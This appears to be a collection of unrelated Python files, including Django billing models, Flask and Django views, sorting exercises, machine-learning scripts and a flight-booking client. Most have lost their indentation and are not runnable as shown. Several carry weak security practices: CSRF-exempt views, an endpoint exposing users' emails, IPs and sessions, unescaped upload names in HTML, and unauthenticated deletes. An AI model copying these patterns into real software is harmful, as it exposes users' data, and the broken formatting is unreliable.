date_purged = models.DateTimeField(null=True, editable=False)
token_expiration = models.DateTimeField(null=True)
objects = CustomerManager()
def __str__(self):
return unicode(self.user)
@classmethod
def get_or_create(cls, user):
try:
return Customer.objects.get(user=user), False
except Customer.DoesNotExist:
return cls.create(user), True
@classmethod
def create(cls, user, token=None):
cus = Customer.objects.create(user=user)
return cus
def get_token(self):
return None
# if self.token_expiration <= Delorean().datetime:
# token = self.update_tokens()
# return token
def update_token(self, token):
if self.braintree_id:
braintree.Customer.update(self.braintree_id,
{"payment_method_nonce": token})
else:
result = braintree.Customer.create({"email": self.user.email,
"payment_method_nonce": token})
self.braintree_id = result.customer.id
self.token = token
self.save(update_fields=['braintree_id', 'token'])
return True
def get_paypal_token(self):
cus = braintree.Customer.find(self.braintree_id)
return cus.paypal_accounts[0].token
def charge_paypal(self, amount, token=None):
""" amount is a string representation of the dollar amount """
token = self.get_paypal_token()
result = braintree.Transaction.sale({"amount": amount,
"payment_method_token": token,
"options": {
"submit_for_settlement": True
}})
if result.is_success:
return result.transaction.id
else:
return result.message
class CurrentSubscription(TimeStampedModel):
STATUS_TRIALING = "trialing"
STATUS_ACTIVE = "active"
STATUS_PAST_DUE = "past_due"
STATUS_CANCELLED = "canceled"
STATUS_UNPAID = "unpaid"
customer = models.OneToOneField(
Customer,
related_name="current_subscription",
null=True
)
plan = models.CharField(max_length=100)
quantity = models.IntegerField()
start = models.DateTimeField()
# trialing, active, past_due, canceled, or unpaid
# In progress of moving it to choices field
status = models.CharField(max_length=25)
cancel_at_period_end = models.BooleanField(default=False)
canceled_at = models.DateTimeField(null=True, blank=True)
current_period_end = models.DateTimeField(null=True)
current_period_start = models.DateTimeField(null=True)
ended_at = models.DateTimeField(null=True, blank=True)
trial_end = models.DateTimeField(null=True, blank=True)
trial_start = models.DateTimeField(null=True, blank=True)
amount = models.DecimalField(decimal_places=2, max_digits=7)
def status_display(self):
return self.status.replace("_", " ").title()
def is_period_current(self):
if self.current_period_end is None:
return False
return self.current_period_end > timezone.now()
def is_status_current(self):
return self.status in [self.STATUS_TRIALING, self.STATUS_ACTIVE]
"""
Status when customer canceled their latest subscription, one that does not prorate,
and therefore has a temporary active subscription until period end.
"""
def is_status_temporarily_current(self):
return self.canceled_at and self.start < self.canceled_at and self.cancel_at_period_end
def is_valid(self):
if not self.is_status_current():
return False
if self.cancel_at_period_end and not self.is_period_current():
return False
return True
def create_charge(self):
url = dwolla_charge(self)
return url
def get_plan(self):
return Plan.objects.get(name=str(self.customer.user))
def charge_subscription(self):
token = self.customer.get_token()
cus = self.customer
metadata = {'recur': 'recur'}
# Need to do something here...
# send_funds.delay(token, DWOLLA_ACCOUNT['user_id'],
# float(self.amount), cus.pin,
# "Devote.io monthly subscription",
# metadata=metadata)
@classmethod
def get_or_create(cls, customer, amount=0):
try:
return CurrentSubscription.objects.get(customer=customer), False
except CurrentSubscription.DoesNotExist:
return cls.create(customer, amount=amount), True
@classmethod
def create(cls, customer, amount=0):
end = Delorean().next_month().truncate("month").datetime
current_sub = CurrentSubscription.objects.create(customer=customer, quantity=1,
start=timezone.now(), status="active",
current_period_end=end, amount=amount,
current_period_start=timezone.now())
return current_sub
def update(self, amount):
self.amount = amount
self.save(update_fields=['amount'])
CURRENCIES = (
('usd', 'U.S. Dollars',),
('gbp', 'Pounds (GBP)',),
('eur', 'Euros',))
INTERVALS = (
('week', 'Week',),
('month', 'Month',),
('year', 'Year',))
|
import json
from django.contrib.auth import get_user_model
from django.core.cache import cache
from django.http import HttpResponse
from django.shortcuts import get_object_or_404
from django.utils.decorators import method_decorator
from django.views.decorators.csrf import csrf_exempt
from rest_framework import viewsets
from api.serializers import UserSerializer
from core.models import Game
from online.status import CACHE_PREFIX_USER, OnlineStatus, refresh_user, refresh_users_list, CACHE_USERS
User = get_user_model()
class OnlineViewSet(viewsets.ViewSet):
@csrf_exempt
def dispatch(self, *args, **kwargs):
return super(OnlineViewSet, self).dispatch(*args, **kwargs)
def list(self, request, game_id):
game = get_object_or_404(Game, pk=game_id)
raw = cache.get(CACHE_USERS % game.id) or []
resp = []
for r in raw:
resp.append({'user': {'id': r.user.id, 'username': r.user.username, 'email': r.user.email},
'game': r.game.id,
'status': r.status,
'seen': r.seen,
'ip': r.ip,
'session': r.session,
})
def date_handler(obj):
return obj.isoformat() if hasattr(obj, 'isoformat') else obj
return HttpResponse(json.dumps(resp, default=date_handler), content_type='application/json')
class OnlineListPingViewSet(viewsets.ViewSet):
@csrf_exempt
def dispatch(self, *args, **kwargs):
return super(OnlineListPingViewSet, self).dispatch(*args, **kwargs)
def create(self, request, game_id):
game = get_object_or_404(Game, pk=self.kwargs.get('game_id'))
onlinestatus = cache.get(CACHE_PREFIX_USER % (request.user.pk, game.id))
if not onlinestatus:
onlinestatus = OnlineStatus(request, game)
refresh_user(request, game)
refresh_users_list(updated=onlinestatus, game_id=game.id)
return HttpResponse('ok') |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.shortcuts import render,redirect,HttpResponse
from models import *
def index(request):
return render(request,'users/index.html')
def show(request):
context = {"User":User.objects.all()}
print User.objects.all()
return render(request,'users/show.html',context)
def process(request):
    request.session["err"] = ""
    if request.method == "POST":
        # run validation once and only create the record when it passes
        if Validate().check(request):
            Validate().create(request)
    return redirect('/show')
def processids(request,ids):
request.session["err"] = ""
if request.POST["name"] == "":
return redirect('/edit/{}'.format(ids))
if request.POST["email"] == "":
return redirect('/edit/{}'.format(ids))
Validate().update(request,ids)
return redirect('/show')
def edit(request,ids):
context = {"User":User.objects.get(id=ids)}
return render(request,"users/edit.html",context)
def delete(request,ids):
user = User.objects.get(id=ids)
user.delete()
return redirect('/show')
def user(request,ids):
context = {"User":User.objects.get(id=ids)}
return render(request,'users/user.html',context)
# Create your views here.
|
def insertionSort(alist):
for index in range(1,len(alist)):
currentvalue = alist[index]
position = index
while position>0 and alist[position-1]>currentvalue:
alist[position]=alist[position-1]
position = position-1
alist[position]=currentvalue
print " ".join(map(str, alist))
m = input()
ar = [int(i) for i in raw_input().strip().split()]
insertionSort(ar) |
import torch
import torch.utils.data
import torchvision
import numpy as np
def make_weights_for_balanced_classes(labels,classes):
labels = np.array(labels)
#print(labels)
weights=[]
outs=[]
weight = 1./ len(labels)
for ic in range(classes):
weights.append(weight/(labels==ic).sum())
for sim in labels:
#print(sim)
outs.append(weights[sim])
return torch.DoubleTensor(outs)
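# Usage sketch (labels are illustrative): the per-sample weights returned
# above are typically passed to a WeightedRandomSampler so that every class
# is drawn with equal probability:
#
#   labels = [0, 0, 0, 1, 1, 2]
#   weights = make_weights_for_balanced_classes(labels, 3)
#   sampler = torch.utils.data.WeightedRandomSampler(
#       weights, num_samples=len(weights), replacement=True)
#   # loader = torch.utils.data.DataLoader(dataset, sampler=sampler)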
|
'''
Baekjoon 2573
Iceberg
'''
import sys
from collections import deque
input=sys.stdin.readline
n, m=map(int, input().split())
board=[]
for _ in range(n):
board.append(list(map(int, input().split())))
q=deque()
q2=deque()
for y in range(n):
for x in range(m):
if board[y][x]!=0:
q.append((x,y))
year=0
sep=False
while True:
year+=1
visited={}
move=[[1,0],[0,1],[-1,0],[0,-1]]
ice=deque()
while q:
node=q.popleft()
if node not in visited:
cnt=0
visited[node]=True
for v in move:
mx=v[0]+node[0]
my=v[1]+node[1]
if board[my][mx]==0 and (mx, my) not in visited:
cnt+=1
else:
q.append((mx, my))
board[node[1]][node[0]]=max(0, board[node[1]][node[0]]-cnt)
if board[node[1]][node[0]]>0:
ice.append((node[0], node[1]))
q=ice
if len(q)==0: break
q2.append(q[0])
visited2={}
while q2:
node=q2.popleft()
if node not in visited2:
visited2[node]=True
for v in move:
mx=v[0]+node[0]
my=v[1]+node[1]
if board[my][mx]>0:
q2.append((mx, my))
if len(q)!=len(visited2):
sep=True
break
if sep:
print(year)
else:
print(0) |
#!/usr/bin/env python
"""Write a reduced lammpstrj file by skipping frames."""
import pathlib
import sys
import re
import io
import mmap
from tqdm import tqdm
def read_lammpstrj(lmp):
"""Iterate frames in a lammpstrj file."""
raw = []
with open(lmp, 'r') as infile:
for lines in infile:
if lines.startswith('ITEM: TIMESTEP'):
if raw:
yield raw
raw = []
raw.append(lines)
if raw:
yield raw
def count_frames(lmp):
"""Count the number of frames in a lammpstrj file."""
pattern = re.compile(b'ITEM: TIMESTEP')
with io.open(lmp, 'r', encoding='utf-8') as infile:
match = pattern.finditer(
mmap.mmap(infile.fileno(), 0, access=mmap.ACCESS_READ)
)
return sum(1 for _ in match)
def main(infile, skip=10):
"""Write a reduced lammpstrj file by skipping frames."""
print('Skip: {}'.format(skip))
print('Infile: {}'.format(infile))
infile_path = pathlib.Path(infile).resolve()
outfile = '{}-skip-{}.lammpstrj'.format(
str(pathlib.Path(infile).stem), skip
)
outfile_path = infile_path.parent.joinpath(outfile)
print('Outfile: {}'.format(outfile_path))
print('Getting number of frames in original file...')
frames_tot = count_frames(infile_path)
print('Frames in original file: {}'.format(frames_tot))
if frames_tot < 1:
print('No frames found, exiting...')
return
frames = 0
frames_read = 0
with tqdm(total=frames_tot) as pbar:
with open(outfile_path, 'w') as output:
for i, frame in enumerate(read_lammpstrj(infile_path)):
frames_read += 1
pbar.update(1)
if i % skip == 0:
frames += 1
output.write(''.join(frame))
print('Frames read: {}'.format(frames_read))
print('Frames written to new file: {}'.format(frames))
return
if __name__ == '__main__':
try:
main(sys.argv[1], skip=int(sys.argv[2]))
except IndexError:
main(sys.argv[1])
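# Example invocation (assuming this script is saved as reduce_lammpstrj.py):
#   python reduce_lammpstrj.py traj.lammpstrj 5
# keeps every 5th frame; omitting the second argument uses the default skip=10.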
|
'''
Created on 2011-9-24
ARG1: FILE NAME
ARG2: YEAR
ARG3: MONTH
SAMPLE: d:\dp21 2011 SEP
USAGE: parse report
@author: caspar32
'''
import sys
initialDay=17
endDay=21
startTime=20
endTime=05
specialBeginDay=20
specialEndDay=21
if __name__ == '__main__':
fileName=sys.argv[1]
year=sys.argv[2]
month=sys.argv[3]
date=month+" "+year
while(initialDay<=endDay):
inputFile = open(fileName,'r')
for lineContent in inputFile:
if (lineContent.find(date)!=-1):
tmpDate=str(initialDay)+" "+date
if(lineContent.find(tmpDate)!=-1):
outputFileName=inputFile.name+'-'+str(month)+'-'+str(initialDay)
outputFile=open(outputFileName,'w')
outputFile.write(lineContent)
newLineContent=inputFile.next()
judgeDate=str(initialDay+1)+' '+date
count=0
while (newLineContent.find(judgeDate)==-1):
outputFile.write(newLineContent)
if(newLineContent.find('FULL ARCHIVE LOG')!=-1):
count=count+1
newLineContent=inputFile.next()
print count
inputFile.close()
outputFile.close()
initialDay=initialDay+1;
inputFile1 = open(fileName,'r')
for lineContent in inputFile1:
tmpDate=str(specialBeginDay)+" "+date
if(lineContent.find(tmpDate)!=-1):
while (lineContent[1:3]<str(startTime)):
lineContent=inputFile1.next()
else:
outputFileName=inputFile1.name+'-'+str(month)+'-special'
outputFile1=open(outputFileName,'w')
tmpDate1=str(specialEndDay)+" "+date
newLineContent=lineContent
count=0
while(newLineContent.find(tmpDate1)==-1):
outputFile1.write(newLineContent)
if(newLineContent.find('FULL ARCHIVE LOG')!=-1):
count=count+1
newLineContent=inputFile1.next()
while (newLineContent[2:3]<str(endTime)):
outputFile1.write(newLineContent)
if(newLineContent.find('FULL ARCHIVE LOG')!=-1):
count=count+1
newLineContent=inputFile1.next()
print count
outputFile1.close()
|
# Chapter 04-01
# Sequence types
'''
< Criteria for classifying data structures >
1-1. Container - may hold elements of different types
     => list, tuple, collections.deque
1-2. Flat - holds a single element type
     => str, bytes, bytearray, array.array, memoryview
2-1. Mutable
     => list, bytearray, array.array, memoryview, deque
2-2. Immutable
     => tuple, str, bytes
'''
# ord(char) returns the Unicode code point of the character
# 1. Plain list append
chars = '!@$##%$^%$^&'
code_lst1 = []
for c in chars:
code_lst1.append(ord(c))
print("일반 list append: ", code_lst1)
# List comprehension => 데이터 양이 커지면서 이런 방법이 더 속도가 우세하다고 함!
code_lst2 = [ord(c) for c in chars]
print("list comprehension: ", code_lst2)
print('-'*50)
# ------------------------------------------------------------------
# Map and Filter build iterators!
# filter(function, iterable) => the result is an iterator, so it can be consumed with next()
filter_ = filter(lambda x: x > 40, [ord(c) for c in chars])
print("filter에 list감싸준 후 :", list(filter_))
# list로 감싸서 list형태로 만들어주자
# map 함수
map_ = map(ord, chars)
print([ord(c) for c in chars])
print('first element:', next(map_))
print('second element:', next(map_))
print('third element:', next(map_))
# ------------------------------------------------------------------
# list comprehension VS Map + Filter
code_lst3 = [ord(c) for c in chars if ord(c) > 40]
code_lst4 = list(filter(lambda x: x > 40, map(ord, chars)))
print("list comprehension: ", code_lst3)
print("Map + Filiter: ", code_lst4)
print('-'*50)
# Creating a generator -> to save memory, it only sets up production of values instead of materializing them all
# try a flat, mutable array structure that holds a single element type
import array
# A generator expression just swaps the list comprehension's brackets [] for parentheses ()
tuple_g = (ord(c) for c in chars)
print(tuple_g, type(tuple_g))
print([ord(c) for c in chars])  # a list comprehension loads all the data into memory at once..!
print(next(tuple_g))
print(next(tuple_g))
# Use a generator to build entries for 4 classrooms with 20 student numbers each
students_g = (f"{room}반 {num}번" for room in 'A B C D'.split() for num in range(1, 21))
print(students_g)
for student in students_g:
print(student)
# Python: independent inner lists vs shared references
marks1 = [['&'] * 3 for _ in range(4)]  # each row is a separate list object
marks2 = [['&'] * 3] * 4  # the same row object referenced 4 times
print(marks1)
print(marks2)
print("일부 요소 수정 후")
marks1[0][0] = '#'
marks2[0][0] = '#'
print(marks1)
print(marks2)  # changing one position changed every row. why!? => the inner lists share the same id!
# compare whether the inner lists' ids are identical
marks1_id = [id(l) for l in marks1]
marks2_id = [id(l) for l in marks2]
print(marks1_id)
print(marks2_id)
|
import os
import sys
import dlib
import glob
import csv
import pickle as pp
from sklearn.neighbors import KNeighborsClassifier
import pandas as pd
from sklearn import preprocessing
# from sklearn.model_selection import train_test_split
import webbrowser
from timeit import Timer
from keras.preprocessing.image import img_to_array
from keras.models import load_model
import numpy as np
from time import time
import multiprocessing
from flask import Flask, render_template, request
from PIL import Image
from elasticsearch import Elasticsearch
#from tensorflow.python.keras._impl.keras.preprocessing.image import img_to_array
from flask import Flask, render_template, request, url_for
app = Flask(__name__, template_folder='templates')
App_root=os.path.dirname("maintype")
@app.route("/knn")
def classify(try_vector): #CLASIFIER OPTION -A using KNN
print("in classifier======================================================")
p_1=pp.load(open('model.p','rb'))
p_2=pp.load(open('model_1.p','rb'))
pred = p_1.predict([try_vector])
v = p_2.inverse_transform(pred)
# print(p_2.inverse_transform(pred))
return v
def vector(destination,option): ###CONVERTING IMAGE INTO 128 vectors --DLIB
predictor_path = "shape_predictor_5_face_landmarks.dat"
face_rec_model_path = "dlib_face_recognition_resnet_model_v1.dat"
faces_folder_path ="./"+destination # Edit Path Name
detector = dlib.get_frontal_face_detector()
sp = dlib.shape_predictor(predictor_path)
facerec = dlib.face_recognition_model_v1(face_rec_model_path)
img = dlib.load_rgb_image(faces_folder_path)
dets = detector(img, 1)
for k, d in enumerate(dets):
shape = sp(img, d)
face_descriptor = facerec.compute_face_descriptor(img, shape)
try_vector=face_descriptor
#print("======================================",try_vector)
if option == "KNN":
starttime = time()
d = classify(try_vector) #knn
timetaken = time()-starttime
print(timetaken)
elif option == "ES":
print("ES Selected")
return ("ES Selected")
# d = esearch(try_vector)
else:
print("CNN Chosen")
return d
@app.route("/") # this runs first
def index():
print("index working==================================")
return render_template("upload1.html")
@app.route("/upload", methods = ['POST'])
def upload():
# print("heyy========================")
target = os.path.join(App_root, "images/")
# print("hello")
if not os.path.isdir(target):
print("In here")
os.mkdir(target)
print("-----------------------",request.files.getlist("file"))
for file in request.files.getlist("file"):
filename = file.filename
destination ="".join([target, filename])
print(destination)
file.save(destination)
option = request.form['classifier']
print(option)
if( option == "KNN" or option == "ES"):
name1 = vector(destination,option)
name1 = str(name1[0])
print(name1, type(name1))
f = open('helloworld.html', 'w')
name = name1 + '.jpg'
# print(name)
name2 = "/home/madhur/Desktop/project2/src/images/" + name
# print(name2)
message = """<html>
<head></head>
<body>
<p>Your input image: </p>
<br>
<img src = "/home/madhur/Desktop/project2/src/""" + destination + """"/>
<br>
<p>Standard Image:</p>
<br>
<img src = "/home/madhur/Desktop/project2/src/images/""" + name + """"/>
<p> """ + name1 + """</p>
</body>
</html>"""
# print(message)
f.write(message)
f.close()
# Change path to reflect file location
filename = 'helloworld.html'
webbrowser.open_new_tab(filename)
return name
# return name
else:
# print("CNN Chosen")
# return("Hello world")
        name = vector(destination, option)
        name = str(name[0]) if name is not None else "CNN not implemented"
print(name, type(name))
f = open('complete.html', 'w')
message = name
f.write(message)
f.close()
# with open("complete.html", "w") as file1:
# file1.write(html)
# return render_template("complete.html")
return("This is CNN Button")
if __name__== "__main__":
app.run(debug=True,port=5001,host='127.0.0.1')
|
import pandas as pd
from keras.models import Sequential
from keras.layers import Dense, Activation
from keras.optimizers import SGD
from keras.layers.advanced_activations import ParametricSoftExponential, ParametricSoftplus
from keras.regularizers import l1, activity_l1, l1l2
M = 30000
N = 1
nb_epoch = 100
num_experiments = 5
results = []
for i in range(num_experiments):
X = pd.DataFrame(pd.np.random.randn(M, 2))
y = pd.DataFrame((X.T.values[:N] * X.T.values[N:])).sum()
row = []
for act in [ParametricSoftExponential(0.0), ParametricSoftplus(), Activation('relu'), Activation('linear')]:
model = Sequential()
model.add(Dense(2 * N, input_dim=2 * N, W_regularizer=l1l2(0.005)))
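        # note: 'act' is a single layer instance added twice (here and after the
        # next Dense), so a parametric activation would share its trainable
        # parameters across both positions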
model.add(act)
model.add(Dense(1 * N, input_dim=2 * N, W_regularizer=l1l2(0.005)))
model.add(act)
model.add(Dense(1, input_dim=1 * N, W_regularizer=None)) # l1l2(0.003)))
model.add(Activation('linear'))
# model.add(Dense(2, input_dim=2, W_regularizer=l1l2(0.001)))
# # model.add(ParametricSoftplus(.2))
# model.add(ParametricSoftExponential(.9, output_dim=1))
# model.add(Dense(1, input_dim=2, W_regularizer=l1l2(0.001)))
# # model.add(ParametricSoftplus(.2))
# model.add(ParametricSoftExponential(-.9))
# model.add(Dense(1, input_dim=2, W_regularizer=l1l2(0.001)))
# model.add(Activation('relu'))
        # solution varies even when the training data is unchanged:
        # this converges to < 0.01 loss about 60% of the time, NaNs about 20% of the time, and an RMSE loss of 1-3 for the remainder
model.compile(loss='mean_squared_error', optimizer='rmsprop') # SGD(lr=0.01, decay=1e-6, momentum=0.9, nesterov=True))
model.fit(X.values, y.values, batch_size=32, validation_split=0, nb_epoch=nb_epoch)
row += [model.evaluate(X.values, y.values)]
print(row)
results += [row]
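# A small summary sketch (assumption: the column order matches the activation
# list above -- soft-exponential, soft-plus, relu, linear).
summary = pd.DataFrame(results, columns=['soft_exp', 'soft_plus', 'relu', 'linear'])
print(summary.mean()) # mean final MSE per activation across experiments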
|
from Calc import *
a = int(input("Enter the first no: "))
b = int(input("Enter the second no: "))
char = input("Choose the operation..\nAdd= a,A\nSub= s,S\nMul= m,M\nDiv= d,D\n")
if char in ('a', 'A'):
    c = add(a, b)
    print("Addition:", c)
elif char in ('s', 'S'):
    c = sub(a, b)
    print("Subtraction:", c)
elif char in ('m', 'M'):
    c = mul(a, b)
    print("Multiplication:", c)
elif char in ('d', 'D'):
    c = div(a, b)
    print("Division:", c)
else:
    print("No choice found.")
|
import time
def selection_sort(data, drawData, tick):
for i in range(len(data) - 1):
minIndex = i
for j in range(i + 1, len(data)):
if(data[j] < data[minIndex]):
drawData(data, ['blue' if x == minIndex else 'gray' for x in range(len(data))])
time.sleep(tick)
minIndex = j
drawData(data, ['green' if x == i or x == minIndex else 'gray' for x in range(len(data))])
time.sleep(tick)
data[i], data[minIndex] = data[minIndex], data[i]
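# Minimal usage sketch (assumption: drawData is normally a GUI redraw callback,
# e.g. tkinter; a no-op lambda stands in so the sort can run headless).
if __name__ == "__main__":
    nums = [5, 2, 9, 1, 7]
    selection_sort(nums, lambda data, colors: None, tick=0)
    print(nums) # -> [1, 2, 5, 7, 9]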
|
class Videogame:
def __init__(self,id,name,year,price,category1,category2,category3,picture,banner,description):
self.id = id
self.name = name
self.year = year
self.price = price
self.category1 = category1
self.category2 = category2
self.category3 = category3
self.picture = picture
self.banner = banner
self.description = description
def dump(self):
return {
'id': self.id,
            'name': self.name,
            'year': self.year,
'price': self.price,
'category1': self.category1,
'category2': self.category2,
'category3':self.category3,
'picture':self.picture,
'banner':self.banner,
'description':self.description,
} |
import os
import json
import sys
import shutil
import uuid
import datetime
from urllib.parse import unquote_plus
import pandas as pd
import torch
from botocore.exceptions import ClientError
from torch.utils.data import DataLoader, SequentialSampler, TensorDataset
from transformers import BertModel, BertTokenizer, AutoTokenizer
import numpy as np
from numpy import dot
from numpy.linalg import norm
from transformers import DistilBertTokenizer
from tqdm import tqdm
###### import the transformers library and the sentence-BERT model ######
import sentence_transformers as st
###################################################################
import procesamiento_similitud as procesamiento
model = st.SentenceTransformer('sentence-model/')
data = pd.read_excel("salidaregla7Ene.xlsx")
data = data[pd.notnull(data["ObservacionFinal"])]
# compute the feature vector
df_similitud = procesamiento.calcular_vector_caracteristicas(data,model)
# this batch should then be used to compute the similarities
# with the CalcularSimilitudes lambda
#
print(len(df_similitud))
df_similitud.to_excel("resultadoSimiEne.xlsx", index = False)
def similitud_coseno_numpy(a,b):
cos_sim = dot(a, b)/(norm(a)*norm(b))
result = cos_sim
return result
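# Quick sanity check for the cosine helper (toy vectors, not model output):
# identical directions give 1.0; orthogonal directions give 0.0.
assert abs(similitud_coseno_numpy(np.array([1.0, 0.0]), np.array([2.0, 0.0])) - 1.0) < 1e-9
assert abs(similitud_coseno_numpy(np.array([1.0, 0.0]), np.array([0.0, 3.0]))) < 1e-9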
def similitud(data):
"""
    Computes the similarities between the comments in the new batch (df1) and
    the database (df); the output is a df with the similarities.
    df: full database
    df1: new batch
    return:
    df: new database = df + df1
    df_similitud: DataFrame of similarities between comments
"""
df = data.copy()
n_columna1 = 'ObservacionFinal'
delta = datetime.timedelta(days = 30)
df["regla1"] = 1
df["regla2"] = 1
df["regla3"] = 1
df["Semejanza_Persona"] = 0
df["Semejanza_Difer"] = 0
df["Semejanza_Persona"] = df["Semejanza_Persona"].astype(object)
df["Semejanza_Difer"] = df["Semejanza_Difer"].astype(object)
    # df1 is appended to df so that each element of df1 is compared with every existing element.
    # loop over each comment in the batch
for i in tqdm(range(len(df))):
        obs_i = df[n_columna1].iloc[i] # observation i (OPS)
        fecha_i = df['Creado'].iloc[i] # creation date of obs i
operacion_i = df['Operacion'].iloc[i]
empresa_i = df['EmpresaContratistaPersonaLiderActividad'].iloc[i]
llave_i = df["Llave"].iloc[i]
        # From the database, select the subset of elements that have the same operation and
        # were created before obs_i
conjunto = df[(df['Operacion']==operacion_i)&(df['Creado']<fecha_i)]
conjunto_name = conjunto[(conjunto["Creado"]> fecha_i-delta)&(conjunto["Llave"]==llave_i)]
conjunto_Noname = conjunto[(conjunto["Creado"]> fecha_i-delta)&(conjunto["Llave"]!=llave_i)]
aux = []
aux1 = []
#print("frase------------")
#print(obs_i)
#print("conjunto ---------------------------")
#print(conjunto_name)
for j in range(len(conjunto_Noname)):
            obs_j = conjunto_Noname[n_columna1].iloc[j] # observation j
ponderador = np.min([len(obs_i),len(obs_j)])/np.max([len(obs_i),len(obs_j)])
similitud = similitud_coseno_numpy(np.array(df["VectorCaracteristicas"].iloc[i]),np.array(conjunto_Noname["VectorCaracteristicas"].iloc[j]))
similitudPon = similitud*ponderador
if similitudPon == 1.0:
aux.append(obs_j)
df["regla2"].iloc[i] = 0
for h in range(len(conjunto_name)):
            obs_h = conjunto_name[n_columna1].iloc[h] # observation h
ponderador = np.min([len(obs_i),len(obs_h)])/np.max([len(obs_i),len(obs_h)])
similitud = similitud_coseno_numpy(np.array(df["VectorCaracteristicas"].iloc[i]),np.array(conjunto_name["VectorCaracteristicas"].iloc[h]))
similitudPon = similitud*ponderador
#print(similitudPon)
if similitudPon == 1.0:
df["regla1"].iloc[i] = 0
elif (similitudPon <= 1.0) & (similitudPon > 0.7):
aux1.append(obs_h)
df["regla3"].iloc[i] = 0
df["Semejanza_Persona"].iloc[i] = aux1
df["Semejanza_Difer"].iloc[i] = aux
return df
aux = similitud(df_similitud) |
print("Demonstration of List")
batches = ["PPA","LB","Angular","Python"]
print(batches)
print(batches[0])
print(batches[1])
print(batches[-1])
print(batches[1:])
print(batches[:3])
# We can store heterogeneous data
data1 = [11,"Shri Swami Samarth",3.14]
print(data1)
data2 = [23,"Om Shiv Shankara",22.48]
print(data2)
# We can create a list of lists
combined = [data1,data2]
print(combined)
# There are multiple methods that we can use to manipulate a list
batches.append("MEAN")
print(batches)
batches.insert(2,"LSP")
print(batches)
batches.remove("LSP")
print(batches)
batches.pop()
print(batches)
batches.pop(2)
print(batches)
del batches[1:]
print(batches)
batches.extend(["LB","PYTHON","ANGULAR","MEAN"])
print(batches)
batches.sort()
print(batches)
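# sorted() returns a new sorted list without mutating the original;
# both sort() and sorted() accept reverse=True and a key function.
print(sorted(batches, reverse=True))
print(sorted(batches, key=len)) # shortest names first
print(batches) # unchanged by sorted()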
|
from transaction import Transaction
class Response(Transaction):
RESPONSE_ACCOUNT_BALANCE= "Account balance"
RESPONSE_MEMBERSHIP_NUM= "Membership number"
def __init__(self, date_time, token):
super().__init__(date_time, token)
self._input = input
@staticmethod
def _validate_str(display_name, str_value):
""" Check if the string is None or empty"""
if str_value == None:
raise ValueError(display_name + " cannot be none")
elif str_value == "":
raise ValueError(display_name + " cannot be empty")
@staticmethod
def _validate_float(display_name, float_value):
""" Check if the number is less than 0"""
if float_value == None or type(float_value) != float:
raise ValueError(display_name + " must be a valid floating point value")
elif float_value < 0.0 :
raise ValueError(display_name + " cannot be negative")
@staticmethod
def _validate_int(display_name, int_value):
""" Check if the number is less than 0"""
if int_value == None or type(int_value) != int:
raise ValueError(display_name + " must be a valid integer value")
elif int_value < 0.0:
raise ValueError(display_name + " cannot be negative") |
import requests, json
HEADER = "http://127.0.0.1:5000"
def get_all_flights():
get_request = requests.get(HEADER + f'/dbInfo')
response = get_request.text
jsons = json.loads(response)
string_to_return = ""
for flight in jsons:
flight_string = f"ID: {flight['id']}, From: {flight['city_from']}, To:{flight['city_to']}, Departure: {flight['departure']}, Arrival: {flight['arrival']}, Airplane: {flight['airplane']}, Passenger Number: {flight['passenger_number']}"
string_to_return += flight_string+'\n'
return string_to_return
def user_get_from_to(from_c, to_c):
get_request = requests.get(HEADER + f'/flights/{from_c}/{to_c}')
response = get_request.text
jsons = json.loads(response)
string_to_return = ""
for flight in jsons:
flight_string = f"From: {flight['city_from']}, To:{flight['city_to']}, Departure: {flight['departure']}, Arrival: {flight['arrival']}, Airplane: {flight['airplane']}, Passenger Number: {flight['passenger_number']}"
string_to_return += flight_string+'\n'
return string_to_return
def check_login(admin_email, admin_password):
login_response = requests.post(HEADER + f"/authentication_authorization", {'email': admin_email, 'password': admin_password})
token = login_response.text
json_token = json.loads(token)
return json_token
def add_to_db(fr, to, t1, t2, a_info, p_num, token):
add_response = requests.post(HEADER + f"/flights", {'token': token, 'fromm': fr, 'to': to, 't1': t1, 't2': t2, 'a_info': a_info, 'p_num': p_num})
def delete_from_db(id, token):
delete_response = requests.delete(HEADER + f"/flights", data={'token': token, 'id': id})
def update_db(id, fromCity, toCity, time1, time2, airplaneInfo, passengerNumber, token):
put_response = requests.put(HEADER + f"/flights", data={'id': id, 'fromC': fromCity, "toC": toCity, "time1": time1, "time2": time2, "aInfo": airplaneInfo, "psngrNum": passengerNumber, 'token': token})
def end_session(token):
delete_response = requests.delete(HEADER + f"/end_session", data={'token': token})
def main():
while True:
person=input('Role (user or admin): ')
if person=="user":
print('')
print("User can make a GET request to http://127.0.0.1:5000/flights/<city_from>/<city_to>")
print('')
city_from = input("city_from: ")
city_to = input("city_to: ")
output = user_get_from_to(city_from, city_to)
print('\nResults:')
print(output)
elif person=="admin":
print('')
email = input('Email: ')
password = input('Password: ')
tokenn = check_login(email, password)
token = tokenn[0]['token']
if(tokenn[0]['token'] != ''):
#login is successful
print()
print('Original DB:\n')
original_db = get_all_flights()
print(original_db)
print()
print("-"*18)
print('ADMIN OPTIONS:\n')
print('*** please, enter flight data without spaces. For example: NOT "June 18, 08:00am", type "June_18,_08:00am"\n')
print('1. POST <city_from> <city_to> <departure_time> <arrival_time> <airplane> <passenger_number>\n')
print('2. DELETE <flight_id>\n')
print('3. PUT <flight_id>\n')
print('4. END_SESSION\n')
print("-"*18)
while True:
option = int(input('Which option would you like to use? '))
if(option == 1):
#POST Mexico Baku may_15,09:00am may_15,23:59pm airplane_5 566
command, fr, to, t1, t2, a_info, p_num = map(str, input('Type command: ').split())
add_to_db(fr, to, t1, t2, a_info, p_num, token)
print('\nDB after POST request:\n')
added_db = get_all_flights()
print(added_db)
elif(option == 2):
command, id = map(str, input('Type command: ').split())
delete_from_db(id, token)
print('\nDB after DELETE request:\n')
deleted_db = get_all_flights()
print(deleted_db)
elif(option == 3):
command, id = map(str, input('Type command: ').split())
print('')
fromCity = input('new city_from: ')
toCity = input('new city_to: ')
time1 = input('new departure_time: ')
time2 = input('new arrival_time: ')
airplaneInfo = input('new airplane_info: ')
passengerNumber = input('new passengerNumber: ')
update_db(id, fromCity, toCity, time1, time2, airplaneInfo, passengerNumber, token)
print('\nDB after PUT request:\n')
updated_dbb = get_all_flights()
print(updated_dbb)
elif(option == 4):
command = input('Type command: ')
end_session(token)
token=''
print(token)
break
else:
#login failed
                print('>>>>>> invalid credentials !!!\n')
if __name__=="__main__":
main() |
import sys
import ply.yacc as yacc
from parameter import *
def p_document(p):
"""
document :
document : token_list
"""
if len(p) == 1:
p[0] = []
else:
p[0] = p[1]
